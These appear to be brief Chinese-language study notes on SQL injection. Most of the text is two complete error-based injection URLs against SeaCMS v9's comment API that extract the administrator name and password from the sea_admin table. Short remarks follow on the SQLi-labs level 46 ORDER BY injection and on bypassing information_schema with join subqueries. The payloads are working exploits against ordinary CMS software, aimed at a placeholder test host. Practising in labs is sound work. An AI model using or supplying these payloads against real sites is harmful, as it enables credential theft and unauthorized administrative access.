1、seacmsv9注入管理员密码
获取管理员账号(name)
http://www.test2.com/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(name)from%20sea_admin))),@`%27`
2、获取管理员密码
http://www.test2.com/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20(password)from%20sea_admin))),@`%27`
2、SQLilabs第46关
使用?sort=1/2其排序不同,可以得知使用了orderby语句,存在漏洞。使用python脚本获取数据。
3、information_schema的绕过
使用join的子查询